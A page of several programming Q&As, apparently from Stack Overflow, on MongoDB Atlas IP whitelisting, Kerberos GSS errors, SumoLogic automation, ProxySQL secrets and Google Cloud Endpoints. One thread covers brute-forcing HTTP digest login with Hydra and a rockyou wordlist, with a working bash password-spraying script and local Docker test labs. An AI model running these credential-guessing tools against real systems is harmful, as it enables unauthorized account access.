Mongo DB Atlas. Is it safe to whitelist all ip because someone attempting to access the database needs a password - mongodb

I have a google app engine with my express server. I also have my db in MongoDB Atlas. I currently have my MongoDB Atlas whitelisting all ip. The connection string is in the code for my express server running on Google Cloud. Presumable any attacker trying to get into the database would still need a user name and password for the connection string.
Is it safe to do this?
If it's not safe, then how do I whitelist my google app engine on Mongo Atlas?

Is it safe to do this?
"Safe" is a relative term. It is safer than having an unauthed database open to the internet, but the weakest link is now your password.
A whitelist is an additional layer of security, so that if someone knows or can guess your password, they can't just connect from anywhere. They must be connecting from a set of known IP addresses. This makes the attack surface smaller, so the database is less likely to be broken into by a random person in the internet.
If it's not safe, then how do I whitelist my google app engine on Mongo Atlas?
You would need to determine the IP ranges of your application, and plug in that range into the whitelist.

here is an answer i left elsewhere. hope it helps someone who comes across this:
this script will be kept up to date on my gist
why
mongo atlas provides a reasonably priced access to a managed mongo DB. CSPs where containers are hosted charge too much for their managed mongo DB. they all suggest setting an insecure CIDR (0.0.0.0/0) to allow the container to access the cluster. this is obviously ridiculous.
this entrypoint script is surgical to maintain least privileged access. only the current hosted IP address of the service is whitelisted.
usage
set as the entrypoint for the Dockerfile
run in cloud init / VM startup if not using a container (and delete the last line exec "$#" since that is just for containers
behavior
uses the mongo atlas project IP access list endpoints
will detect the hosted IP address of the container and whitelist it with the cluster using the mongo atlas API
if the service has no whitelist entry it is created
if the service has an existing whitelist entry that matches current IP no change
if the service IP has changed the old entry is deleted and new one is created
when a whitelist entry is created the service sleeps for 60s to wait for atlas to propagate access to the cluster
env
setup
create API key for org
add API key to project
copy the public key (MONGO_ATLAS_API_PK) and secret key (MONGO_ATLAS_API_SK)
go to project settings page and copy the project ID (MONGO_ATLAS_API_PROJECT_ID)
provide the following values in the env of the container service
SERVICE_NAME: unique name used for creating / updating (deleting old) whitelist entry
MONGO_ATLAS_API_PK: step 3
MONGO_ATLAS_API_SK: step 3
MONGO_ATLAS_API_PROJECT_ID: step 4
deps
bash
curl
jq CLI JSON parser
# alpine / apk
apk update \
&& apk add --no-cache \
bash \
curl \
jq
# ubuntu / apt
export DEBIAN_FRONTEND=noninteractive \
&& apt-get update \
&& apt-get -y install \
bash \
curl \
jq
script
#!/usr/bin/env bash
# -- ENV -- #
# these must be available to the container service at runtime
#
# SERVICE_NAME
#
# MONGO_ATLAS_API_PK
# MONGO_ATLAS_API_SK
# MONGO_ATLAS_API_PROJECT_ID
#
# -- ENV -- #
set -e
mongo_api_base_url='https://cloud.mongodb.com/api/atlas/v1.0'
check_for_deps() {
deps=(
bash
curl
jq
)
for dep in "${deps[#]}"; do
if [ ! "$(command -v $dep)" ]
then
echo "dependency [$dep] not found. exiting"
exit 1
fi
done
}
make_mongo_api_request() {
local request_method="$1"
local request_url="$2"
local data="$3"
curl -s \
--user "$MONGO_ATLAS_API_PK:$MONGO_ATLAS_API_SK" --digest \
--header "Accept: application/json" \
--header "Content-Type: application/json" \
--request "$request_method" "$request_url" \
--data "$data"
}
get_access_list_endpoint() {
echo -n "$mongo_api_base_url/groups/$MONGO_ATLAS_API_PROJECT_ID/accessList"
}
get_service_ip() {
echo -n "$(curl https://ipinfo.io/ip -s)"
}
get_previous_service_ip() {
local access_list_endpoint=`get_access_list_endpoint`
local previous_ip=`make_mongo_api_request 'GET' "$access_list_endpoint" \
| jq --arg SERVICE_NAME "$SERVICE_NAME" -r \
'.results[]? as $results | $results.comment | if test("\\[\($SERVICE_NAME)\\]") then $results.ipAddress else empty end'`
echo "$previous_ip"
}
whitelist_service_ip() {
local current_service_ip="$1"
local comment="Hosted IP of [$SERVICE_NAME] [set#$(date +%s)]"
if (( "${#comment}" > 80 )); then
echo "comment field value will be above 80 char limit: \"$comment\""
echo "comment would be too long due to length of service name [$SERVICE_NAME] [${#SERVICE_NAME}]"
echo "change comment format or service name then retry. exiting to avoid mongo API failure"
exit 1
fi
echo "whitelisting service IP [$current_service_ip] with comment value: \"$comment\""
response=`make_mongo_api_request \
'POST' \
"$(get_access_list_endpoint)?pretty=true" \
"[
{
\"comment\" : \"$comment\",
\"ipAddress\": \"$current_service_ip\"
}
]" \
| jq -r 'if .error then . else empty end'`
if [[ -n "$response" ]];
then
echo 'API error whitelisting service'
echo "$response"
exit 1
else
echo "whitelist request successful"
echo "waiting 60s for whitelist to propagate to cluster"
sleep 60s
fi
}
delete_previous_service_ip() {
local previous_service_ip="$1"
echo "deleting previous service IP address of [$SERVICE_NAME]"
make_mongo_api_request \
'DELETE' \
"$(get_access_list_endpoint)/$previous_service_ip"
}
set_mongo_whitelist_for_service_ip() {
local current_service_ip=`get_service_ip`
local previous_service_ip=`get_previous_service_ip`
if [[ -z "$previous_service_ip" ]]; then
echo "service [$SERVICE_NAME] has not yet been whitelisted"
whitelist_service_ip "$current_service_ip"
elif [[ "$current_service_ip" == "$previous_service_ip" ]]; then
echo "service [$SERVICE_NAME] IP has not changed"
else
echo "service [$SERVICE_NAME] IP has changed from [$previous_service_ip] to [$current_service_ip]"
delete_previous_service_ip "$previous_service_ip"
whitelist_service_ip "$current_service_ip"
fi
}
check_for_deps
set_mongo_whitelist_for_service_ip
# run CMD
exec "$#"

Related

Brute forcing http digest with Hydra

I am having some trouble brute forcing a HTTP digest form with Hydra. I am using the following command however when proxied through burp suite hydra I can see hydra is using basic auth and not digest.
How do I get hydra to use the proper auth type?
Command:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -vV http-get /digest
Request as seen in proxy:
GET /digest HTTP/1.1
Host: 127.0.0.1
Connection: close
Authorization: Basic YWRtaW46aWxvdmV5b3U=
User-Agent: Mozilla/4.0 (Hydra)
I have studied this case, if the digest method is implemented on Nginx or apache servers level, hydra might work. But if the authentication is implemented on the application server like Flask, Expressjs, Django, it will not work at all
You can create a bash script for password spraying
#!/bin/bash
cat $1 | while read USER; do
cat $2 | while read PASSWORD; do
if curl -s $3 -c /tmp/cookie --digest -u $USER:$PASSWORD | grep -qi "unauth"
then
continue
else
echo [+] Found $USER:$PASSWORD
exit 0
fi
done
done
Save this file as app.sh
$ chmod +x app.sh
$ ./app.sh /path/to/users.txt /path/to/passwords.txt http://example.com/path
Since no Hydra version was specified, I assume the latest one: 9.2.
#tbhaxor is correct:
Against a server like Apache or nginx Hydra works. Flask using digest authentication as recommended in the standard documentation does not work (details later). You could add the used web server so somebody can verify this.
Hydra does not provide explicit parameters to distinguish between basic and digest authentication.
Technically, it first sends a request that attempts to authenticate itself via basic authentication. After that it evaluates the corresponding response.
The specification of digest authentication states that the web application has to send a header WWW-Authenticate : Digest ... in the response if the requested documented is protected using the scheme.
So Hydra now can distinguish between the two forms of authentication.
If it receives this response (cf. code), it sends a second attempt using digest authentication.
The reason why you only can see basic auth and not digest requests is due to the default setting of what Hydra calls "tasks". This is set to 16 by default, which means it initially creates 16 threads.
Thus, if you go to the 17th request in your proxy you will find a request using digest auth. You can also see the difference if you set the number of tasks to 1 with the parameter -t 1.
Following 3 Docker setups where you can test the differences in basic auth (nginx), digest auth(nginx) and digest auth(Flask) using "admin/password" credentials based upon your example:
basic auth:
cat Dockerfile.http_basic_auth
FROM nginx:1.21.3
LABEL maintainer="secf00tprint"
RUN apt-get update && apt-get install -y apache2-utils
RUN touch /usr/share/nginx/html/.htpasswd
RUN htpasswd -db /usr/share/nginx/html/.htpasswd admin password
RUN sed -i '/^ location \/ {/a \ auth_basic "Administrator\x27s Area";\n\ auth_basic_user_file /usr/share/nginx/html/.htpasswd;' /etc/nginx/conf.d/default.conf
:
sudo docker build -f Dockerfile.http_basic_auth -t http-server-basic-auth .
sudo docker run -ti -p 127.0.0.1:8888:80 http-server-basic-auth
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8888 http-get /
digest auth (nginx):
cat Dockerfile.http_digest
FROM ubuntu:20.10
LABEL maintainer="secf00tprint"
RUN apt-get update && \
# For digest module
DEBIAN_FRONTEND=noninteractive apt-get install -y curl unzip \
# For nginx
build-essential libpcre3 libpcre3-dev zlib1g zlib1g-dev libssl-dev libgd-dev libxml2 libxml2-dev uuid-dev make apache2-utils expect
RUN curl -O https://nginx.org/download/nginx-1.21.3.tar.gz
RUN curl -OL https://github.com/atomx/nginx-http-auth-digest/archive/refs/tags/v1.0.0.zip
RUN tar -xvzf nginx-1.21.3.tar.gz
RUN unzip v1.0.0.zip
RUN cd nginx-1.21.3 && \
./configure --prefix=/usr/share/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/ nginx.lock --pid-path=/run/nginx.pid --modules-path=/etc/nginx/modules --add-module=../nginx-http-auth-digest-1.0.0/ && \
make && make install
COPY generate.exp /usr/share/nginx/html/
RUN chmod u+x /usr/share/nginx/html/generate.exp && \
cd /usr/share/nginx/html/ && \
expect -d generate.exp
RUN sed -i '/^ location \/ {/a \ auth_digest "this is not for you";' /etc/nginx/nginx.conf
RUN sed -i '/^ location \/ {/i \ auth_digest_user_file /usr/share/nginx/html/passwd.digest;' /etc/nginx/nginx.conf
CMD nginx && tail -f /var/log/nginx/access.log -f /var/log/nginx/error.log
:
cat generate.exp
#!/usr/bin/expect
set timeout 70
spawn "/usr/bin/htdigest" "-c" "passwd.digest" "this is not for you" "admin"
expect "New password: " {send "password\r"}
expect "Re-type new password: " {send "password\r"}
wait
:
sudo docker build -f Dockerfile.http_digest -t http_digest .
sudo docker run -ti -p 127.0.0.1:8888:80 http_digest
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8888 http-get /
digest auth (Flask):
cat Dockerfile.http_digest_fask
FROM ubuntu:20.10
LABEL maintainer="secf00tprint"
RUN apt-get update -y && \
apt-get install -y python3-pip python3-dev
# We copy just the requirements.txt first to leverage Docker cache
COPY ./requirements.txt /app/requirements.txt
WORKDIR /app
RUN pip3 install -r requirements.txt
COPY ./app.py /app/
CMD ["flask", "run", "--host=0.0.0.0"]
:
cat requirements.txt
Flask==2.0.2
Flask-HTTPAuth==4.5.0
:
cat app.py
from flask import Flask
from flask_httpauth import HTTPDigestAuth
app = Flask(__name__)
app.secret_key = 'super secret key'
auth = HTTPDigestAuth()
users = {
"admin" : "password",
"john" : "hello",
"susan" : "bye"
}
#auth.get_password
def get_pw(username):
if username in users:
return users.get(username)
return None
#app.route("/")
#auth.login_required
def hello_world():
return "<p>Flask Digest Demo</p>"
:
sudo docker build -f Dockerfile.http_digest_flask -t digest_flask .
sudo docker run -ti -p 127.0.0.1:5000:5000 digest_flask
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 5000 http-get /
If you want to see more information I wrote about it in more detail here.

gss_accept_sec_context() error:ASN.1 structure is missing a required field

I'm trying to implement Kerberos authentication on Ubuntu.
run_kerberos_server.sh
#!/usr/bin/env bash
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
docker stop krb5-server && docker rm krb5-server && true
docker run -d --network=altexy --name krb5-server \
-e KRB5_REALM=EXAMPLE.COM -e KRB5_KDC=localhost -e KRB5_PASS=12345 \
-v /etc/localtime:/etc/localtime:ro \
-v /etc/timezone:/etc/timezone:ro \
--network-alias example.com \
-p 88:88 -p 464:464 -p 749:749 gcavalcante8808/krb5-server
echo "=== Init krb5-server docker container ==="
docker exec krb5-server /bin/sh -c "
# Create users bob as normal user
# and add principal for the service
cat << EOF | kadmin.local
add_principal -randkey \"HTTP/service.example.com#EXAMPLE.COM\"
ktadd -k /etc/krb5-service.keytab -norandkey \"HTTP/service.example.com#EXAMPLE.COM\"
ktadd -k /etc/admin.keytab -norandkey \"admin/admin#EXAMPLE.COM\"
listprincs
quit
EOF
"
echo "=== Copy keytabs ==="
docker cp krb5-server:/etc/krb5-service.keytab "${DIR}"/krb5-service.keytab
docker cp krb5-server:/etc/admin.keytab "${DIR}"/admin.keytab
Get Kerberos ticket:
alex#alex-secfense:~/projects/proxy-auth/etc/kerberos$ kinit admin/admin#EXAMPLE.COM
Password for admin/admin#EXAMPLE.COM:
alex#alex-secfense:~/projects/proxy-auth/etc/kerberos$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: admin/admin#EXAMPLE.COM
Valid starting Expires Service principal
16.12.2020 12:05:38 17.12.2020 00:05:38 krbtgt/EXAMPLE.COM#EXAMPLE.COM
renew until 17.12.2020 12:05:35
Then I start nginx, also in Docker container, image is derived from openresty/openresty:xenial.
My /etc/hosts file has 127.0.0.1 service.example.com line.
My Firefox is configured for network.negotiate-auth.trusted-uris = service.example.com
I open service.example.com:<mapped_port> page in Firefox, nginx responds with 401 and Firefox send Authorization: Negotiate ...` header.
My server side code (error and result handling is stripped):
MYAPI int authenticate(const char* token, size_t length)
{
gss_buffer_desc service = GSS_C_EMPTY_BUFFER;
gss_name_t my_gss_name = GSS_C_NO_NAME;
gss_cred_id_t my_gss_creds = GSS_C_NO_CREDENTIAL;
OM_uint32 minor_status;
OM_uint32 major_status;
gss_ctx_id_t gss_context = GSS_C_NO_CONTEXT;
gss_name_t client_name = GSS_C_NO_NAME;
gss_buffer_desc output_token = GSS_C_EMPTY_BUFFER;
gss_buffer_desc input_token = GSS_C_EMPTY_BUFFER;
input_token.length = length;
input_token.value = (void*)token;
major_status = gss_accept_sec_context(&minor_status, &gss_context, my_gss_creds, &input_token,
GSS_C_NO_CHANNEL_BINDINGS, &client_name, NULL, &output_token, NULL, NULL, NULL);
return 0;
}
Eventually, I get gss_accept_sec_context() error:ASN.1 structure is missing a required field error.
The same code works great with Windows Kerberos setup.
Any idea what does it mean or how to debug the issue?
I did define KRB5_TRACE=/<log_file_name> environment variable and see lines like below:
[7] 1607798057.341744: Sending request (937 bytes) to EXAMPLE.COM
[6] 1608109670.292389: Sending request (937 bytes) to EXAMPLE.COM
[6] 1608109670.660887: Sending request (937 bytes) to EXAMPLE.COM
May it be DNS issue?
UPDATE: I missed that I specify keyatb file to use on server side before calling gss_accept_sec_context (again error handling is stripped out):
OM_uint32 major_status = gsskrb5_register_acceptor_identity(keytab_filename)
You code breaks the fundemantal concept of context completion. It violates RFC 7546 and is not trustworthy, plus you completely ignore major/minor. Now, you tokens get modified somehow in-flight because the ASN.1 encoding is broken.
Dump token before and after transmission and compare.
Start with gss-server and gss-client first.
Read their code and implement your alike. Do not deviate from the imperative of the context look completion,
Show the ticket cache after Firefox has obtained a service ticket.
As soon as you have to tokens, display inspect them with https://lapo.it/asn1js/.

SumoLogic dashboards - how do I automate?

I am getting some experience with SumoLogic dashboards and alerting. I would like to have all possible configuration in code. Does anyone have experience with automation of SumoLogic configuration? At the moment I am using Ansible for general server and infra provisioning.
Thanks for all info!
Best Regards,
Rafal.
(The dashboards, alerts, etc. are referred to as Content in Sumo Logic parlance)
You can use the Content Management API, especially the content-import-job. I am not an expert in Ansible, but I am not aware of any way to plug that API into Ansible.
Also there's a community Terraform provider for Sumo Logic and it supports content:
resource "sumologic_content" "test" {
parent_id = "%s"
config =
{
"type": "SavedSearchWithScheduleSyncDefinition",
"name": "test-333",
"search": {
"queryText": "\"warn\"",
"defaultTimeRange": "-15m",
[...]
Disclaimer: I am currently employed by Sumo Logic
Below is the shell script to import the dashboard. Here it is SumoLogic AU instance. eg: https://api.au.sumologic.com/api. This will be changed based on your country.
Note: You can export all of your dashboard as json files.
#!/usr/bin/env bash
set -e
# if you are using AWS parameter store
# accessKey=$(aws ssm get-parameter --name path_to_your_key --with-decryption --query 'Parameter.Value' --region=ap-southeast-2 | tr -d \")
# accessSecret=$(aws ssm get-parameter --name name path_to_your_secret --with-decryption --query 'Parameter.Value' --region=ap-southeast-2 | tr -d \")
# yourDashboardFolderName="xxxxx" # this is the folder id in the sumologic where you want to create dashboards
# if you are using just key and secreat
accessKey= "your_sumologic_key"
accessSecret= "your_sumologic_secret"
yourDashboardFolderName="xxxxx" # this is the folder id in the sumologic
# you can place all the json files of dashboard in ./Sumologic/Dashboards folder.
for f in $(find ./Sumologic/Dashboards -name '*.json'); \
do \
curl -X POST https://api.au.sumologic.com/api/v2/content/folders/$yourDashboardFolderName/import \
-H "Content-Type: application/json" \
-u "$accessKey:$accessSecret" \
-d #$f \
;done

sqlproxy: inject secrets into sqlproxy.cnf

I have a few proxysql (https://proxysql.com/) instances (running in Kubernetes). However, I don't want to hardcode the db credentials in the config file (proxysql.cnf). I was hoping I could use ENV variables but I wasn't able to get that to work. What is the proper way to include secrets in a proxysql instance without hard coding passwords in plain text files?
I was thinking of including the config file as one secret and mount it in Kubernetes (seem over kill or wrong) or run envsubstr via in a startup script or init container.
Thoughts?
What I ended up doing was I ran a sidecar with an init script as a configmap:
#!/bin/sh
echo "Check if mysqld is running..."
while ! nc -z 127.0.0.1 6032; do
sleep 0.1
done
echo "mysql is running!"
echo "Loading Runtime Data..."
echo "INSERT INTO mysql_users(username,password,default_hostgroup) VALUES ('$USERNAME','$PASSWORD',1);" | mysql -u $PROXYSQL_USER -p$PROXYSQL_PASSWORD -h 127.0.0.1 -P6032
echo "LOAD MYSQL USERS TO RUNTIME;" | mysql -u $PROXYSQL_USER -p$PROXYSQL_PASSWORD -h 127.0.0.1 -P6032
echo "Runtime Data loaded."
while true; do sleep 300; done;
Seem to work nicely.

Google Cloud Endpoint Error when creating service config

I am trying to configure Google Cloud Endpoints using Cloud Functions. For the same I am following instructions from: https://cloud.google.com/endpoints/docs/openapi/get-started-cloud-functions
I have followed the steps given and have come to the point of building the service config into a new ESPv2 Beta docker image. When I give the command:
chmod +x gcloud_build_image
./gcloud_build_image -s CLOUD_RUN_HOSTNAME \
-c CONFIG_ID -p ESP_PROJECT_ID
after replacing the hostname and configid and projectid I get the following error
> -c service-host-name-xxx -p project-id
Using base image: gcr.io/endpoints-release/endpoints-runtime-serverless:2
++ mktemp -d /tmp/docker.XXXX
+ cd /tmp/docker.5l3t
+ gcloud endpoints configs describe service-host-name-xxx.run.app --project=project-id --service=service-host-name-xxx.app --format=json
ERROR: (gcloud.endpoints.configs.describe) NOT_FOUND: Service configuration 'services/service-host-name-xxx.run.app/configs/service-host-name-xxx' not found.
+ error_exit 'Failed to download service config'
+ echo './gcloud_build_image: line 46: Failed to download service config (exit 1)'
./gcloud_build_image: line 46: Failed to download service config (exit 1)
+ exit 1
Any idea what am I doing wrong? Thanks
My bad. I repeated the steps and got it working. So I guess there must have been some mistake I did while trying it out. The document works as it states.
I had the same error. When running the script twice it works. This means you have to already have a service endpoint configured, which does not exist yet when the script tries to fetch the endpoint information with:
gcloud endpoints configs describe service-host-name-xxx.run.app
What I would do (in cloudbuild) is to supply some sort of an "empty" container first. I used the following example on top of my cloudbuild.yaml:
gcloud run services list \
--platform managed \
--project ${PROJECT_ID} \
--region europe-west1 \
--filter=${PROJECT_ID}-esp-svc \
--format yaml | grep . ||
gcloud run deploy ${PROJECT_ID}-esp-svc \
--image="gcr.io/endpoints-release/endpoints-runtime-serverless:2" \
--allow-unauthenticated \
--platform managed \
--project=${PROJECT_ID} \
--region=europe-west1 \
--timeout=120